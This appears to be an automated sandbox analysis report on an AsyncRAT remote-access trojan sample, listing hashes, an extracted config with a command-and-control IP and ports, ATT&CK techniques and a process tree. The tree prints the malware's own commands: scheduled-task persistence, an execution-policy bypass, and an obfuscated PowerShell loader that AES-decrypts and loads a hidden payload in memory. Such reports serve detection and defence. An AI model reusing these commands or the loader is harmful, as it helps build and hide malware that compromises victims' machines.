asyncrat | b706de1b9f7ef2d7f6c4d5fddd9525d907a7a0fdb087d98c4a01589f6178edc7

Analysis

max time kernel
35s
max time network
38s
platform
windows7_x64
resource
win7-20221111-en
resource tags

arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system
submitted
08/02/2023, 18:49

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

iFYEJ.exe
Size

2.5MB
MD5

acfe53c70928d44f9cf498495145ec84
SHA1

2a12b327d4e5628904cc25c5f134732d6265e662
SHA256

b706de1b9f7ef2d7f6c4d5fddd9525d907a7a0fdb087d98c4a01589f6178edc7
SHA512

345143bcc9895282d2843efee182eb07bc0d0179c0c1e6ffcdd7ff9f1d44c252ffccb1b56c2b48c70b554f3427f6a1c23a6ea6b1c9e76edcbe655e88e247741c
SSDEEP

49152:Gg8nNv+SzYW4ZOUB5hempuE8OOTRmgysj8k4:Gg8h14

Score

10^/10

asyncrat default rat

Malware Config

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

Default

89.117.21.143:6606

89.117.21.143:7707

89.117.21.143:8808

Mutex

AsyncMutex_6SI8OkPnk

Attributes

delay
3
install
false
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers.
rat asyncrat

Async RAT payload 7 IoCs

rat

resource	yara_rule
behavioral1/memory/820-61-0x0000000000400000-0x0000000000412000-memory.dmp	asyncrat
behavioral1/memory/820-62-0x0000000000400000-0x0000000000412000-memory.dmp	asyncrat
behavioral1/memory/820-63-0x0000000000400000-0x0000000000412000-memory.dmp	asyncrat
behavioral1/memory/820-64-0x000000000040C71E-mapping.dmp	asyncrat
behavioral1/memory/820-66-0x0000000000400000-0x0000000000412000-memory.dmp	asyncrat
behavioral1/memory/820-68-0x0000000000400000-0x0000000000412000-memory.dmp	asyncrat
behavioral1/memory/820-74-0x00000000005F0000-0x0000000000612000-memory.dmp	asyncrat

Executes dropped EXE 1 IoCs

pid	Process
912	vmtuci.bat.exe

Loads dropped DLL 1 IoCs

pid	Process
1748	cmd.exe

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 1636 set thread context of 820	1636	iFYEJ.exe	30

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
1496	schtasks.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
1556	timeout.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
1224	powershell.exe
1224	powershell.exe
1224	powershell.exe
912	vmtuci.bat.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	1636	iFYEJ.exe
Token: SeDebugPrivilege	820	vbc.exe
Token: SeDebugPrivilege	1224	powershell.exe
Token: SeDebugPrivilege	912	vmtuci.bat.exe

Suspicious use of WriteProcessMemory 41 IoCs

description	pid	Process	procid_target
PID 1636 wrote to memory of 620	1636	iFYEJ.exe	27
PID 1636 wrote to memory of 620	1636	iFYEJ.exe	27
PID 1636 wrote to memory of 620	1636	iFYEJ.exe	27
PID 1636 wrote to memory of 620	1636	iFYEJ.exe	27
PID 620 wrote to memory of 1496	620	cmd.exe	29
PID 620 wrote to memory of 1496	620	cmd.exe	29
PID 620 wrote to memory of 1496	620	cmd.exe	29
PID 620 wrote to memory of 1496	620	cmd.exe	29
PID 1636 wrote to memory of 820	1636	iFYEJ.exe	30
PID 1636 wrote to memory of 820	1636	iFYEJ.exe	30
PID 1636 wrote to memory of 820	1636	iFYEJ.exe	30
PID 1636 wrote to memory of 820	1636	iFYEJ.exe	30
PID 1636 wrote to memory of 820	1636	iFYEJ.exe	30
PID 1636 wrote to memory of 820	1636	iFYEJ.exe	30
PID 1636 wrote to memory of 820	1636	iFYEJ.exe	30
PID 1636 wrote to memory of 820	1636	iFYEJ.exe	30
PID 1636 wrote to memory of 820	1636	iFYEJ.exe	30
PID 820 wrote to memory of 1560	820	vbc.exe	32
PID 820 wrote to memory of 1560	820	vbc.exe	32
PID 820 wrote to memory of 1560	820	vbc.exe	32
PID 820 wrote to memory of 1560	820	vbc.exe	32
PID 820 wrote to memory of 936	820	vbc.exe	34
PID 820 wrote to memory of 936	820	vbc.exe	34
PID 820 wrote to memory of 936	820	vbc.exe	34
PID 820 wrote to memory of 936	820	vbc.exe	34
PID 1560 wrote to memory of 1224	1560	cmd.exe	36
PID 1560 wrote to memory of 1224	1560	cmd.exe	36
PID 1560 wrote to memory of 1224	1560	cmd.exe	36
PID 1560 wrote to memory of 1224	1560	cmd.exe	36
PID 936 wrote to memory of 1556	936	cmd.exe	37
PID 936 wrote to memory of 1556	936	cmd.exe	37
PID 936 wrote to memory of 1556	936	cmd.exe	37
PID 936 wrote to memory of 1556	936	cmd.exe	37
PID 1224 wrote to memory of 1748	1224	powershell.exe	38
PID 1224 wrote to memory of 1748	1224	powershell.exe	38
PID 1224 wrote to memory of 1748	1224	powershell.exe	38
PID 1224 wrote to memory of 1748	1224	powershell.exe	38
PID 1748 wrote to memory of 912	1748	cmd.exe	40
PID 1748 wrote to memory of 912	1748	cmd.exe	40
PID 1748 wrote to memory of 912	1748	cmd.exe	40
PID 1748 wrote to memory of 912	1748	cmd.exe	40

C:\Users\Admin\AppData\Local\Temp\iFYEJ.exe
"C:\Users\Admin\AppData\Local\Temp\iFYEJ.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1636
- C:\Windows\SysWOW64\cmd.exe
  "cmd" /C schtasks /create /tn \oFNTE /tr "C:\Users\Admin\AppData\Local\Temp\iFYEJ.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:620
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /tn \oFNTE /tr "C:\Users\Admin\AppData\Local\Temp\iFYEJ.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /f
    3⤵
    - Creates scheduled task(s)
    PID:1496
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:820
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\vmtuci.bat"' & exit
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1560
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\vmtuci.bat"'
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1224
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\vmtuci.bat" "
        5⤵
        Loads dropped DLL
        Suspicious use of WriteProcessMemory
        
        PID:1748
      - C:\Users\Admin\AppData\Local\Temp\vmtuci.bat.exe
        
        "vmtuci.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $jwaHO = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\vmtuci.bat').Split([Environment]::NewLine);foreach ($eKGSM in $jwaHO) { if ($eKGSM.StartsWith(':: ')) { $qdqSr = $eKGSM.Substring(3); break; }; };$QQCgF = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($qdqSr);$AmjNH = New-Object System.Security.Cryptography.AesManaged;$AmjNH.Mode = [System.Security.Cryptography.CipherMode]::CBC;$AmjNH.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$AmjNH.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('h2/C7kSVdBKzfHpNijDOerbgICwzq39ikAsdwwbv4us=');$AmjNH.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7g2z5diB2473fR8+2MRCTQ==');$wgvzs = $AmjNH.CreateDecryptor();$QQCgF = $wgvzs.TransformFinalBlock($QQCgF, 0, $QQCgF.Length);$wgvzs.Dispose();$AmjNH.Dispose();$tkbaD = New-Object System.IO.MemoryStream(, $QQCgF);$TZnYn = New-Object System.IO.MemoryStream;$FtxeR = New-Object System.IO.Compression.GZipStream($tkbaD, [IO.Compression.CompressionMode]::Decompress);$FtxeR.CopyTo($TZnYn);$FtxeR.Dispose();$tkbaD.Dispose();$TZnYn.Dispose();$QQCgF = $TZnYn.ToArray();$IqKDG = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($QQCgF);$vjmLt = $IqKDG.EntryPoint;$vjmLt.Invoke($null, (, [string[]] ('')))
        6⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:912
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp9403.tmp.bat""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:936
  - - C:\Windows\SysWOW64\timeout.exe
      timeout 2
      4⤵
      Delays execution with timeout.exe
      PID:1556

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Scripting

T1064

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Scripting

T1064

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\tmp9403.tmp.bat

Filesize
167B

MD5
f4a02f9101ebc4ff6d1396019cc061e3

SHA1
0f359e60eba8c0b7e9973589a34570df881be507

SHA256
0bb30e5b6ea6065e7616ba540ff70f0f37ebfef925409fc04f60181ae915fefc

SHA512
521d3e2e7d54b5f4a7816877a59c149db78303442433de26e04268fd91112ba5e6b103d06efa4a03ad3490c3b6fff6fd1393da54f02c28d531de348f78b7f69b

Download Submit
C:\Users\Admin\AppData\Local\Temp\vmtuci.bat

Filesize
325KB

MD5
0e901cd4460579b61abece2b88f54035

SHA1
e776e751a2257cc6d56b85dd7f3c5c1a64bfc604

SHA256
59fbf83208e965445268cc973a63516dba60c68eced0d3cd8ed2e9499951dc32

SHA512
f15cbd6d506142f0c1f3f5271881c4e083d08976f34d18b72d4967efe33f4479acf3d3f3b5d9ea537f110be407a72c968204494428e1f0626ffe10bdc3df4a45

Download Submit
C:\Users\Admin\AppData\Local\Temp\vmtuci.bat.exe

Filesize
442KB

MD5
92f44e405db16ac55d97e3bfe3b132fa

SHA1
04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d

SHA256
6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7

SHA512
f7d85cfb42a4d859d10f1f06f663252be50b329fcf78a05bb75a263b55235bbf8adb89d732935b1325aaea848d0311ab283ffe72b19db93e6c28a859204fdf9f

Download Submit
\Users\Admin\AppData\Local\Temp\vmtuci.bat.exe

Filesize
442KB

MD5
92f44e405db16ac55d97e3bfe3b132fa

SHA1
04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d

SHA256
6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7

SHA512
f7d85cfb42a4d859d10f1f06f663252be50b329fcf78a05bb75a263b55235bbf8adb89d732935b1325aaea848d0311ab283ffe72b19db93e6c28a859204fdf9f

Download Submit
memory/820-63-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/820-58-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/820-62-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/820-61-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/820-66-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/820-68-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/820-69-0x00000000761F1000-0x00000000761F3000-memory.dmp

Filesize
8KB

Download
memory/820-70-0x0000000005770000-0x00000000057EE000-memory.dmp

Filesize
504KB

Download
memory/820-71-0x0000000000510000-0x000000000051A000-memory.dmp

Filesize
40KB

Download
memory/820-72-0x0000000005C30000-0x0000000005CC0000-memory.dmp

Filesize
576KB

Download
memory/820-73-0x0000000005F70000-0x0000000005FD0000-memory.dmp

Filesize
384KB

Download
memory/820-74-0x00000000005F0000-0x0000000000612000-memory.dmp

Filesize
136KB

Download
memory/820-59-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/912-90-0x0000000074430000-0x00000000749DB000-memory.dmp

Filesize
5.7MB

Download
memory/912-89-0x0000000074430000-0x00000000749DB000-memory.dmp

Filesize
5.7MB

Download
memory/1224-81-0x0000000073E80000-0x000000007442B000-memory.dmp

Filesize
5.7MB

Download
memory/1224-84-0x0000000073E80000-0x000000007442B000-memory.dmp

Filesize
5.7MB

Download
memory/1636-57-0x00000000007A0000-0x00000000007C6000-memory.dmp

Filesize
152KB

Download
memory/1636-54-0x0000000000E60000-0x00000000010E8000-memory.dmp

Filesize
2.5MB

Download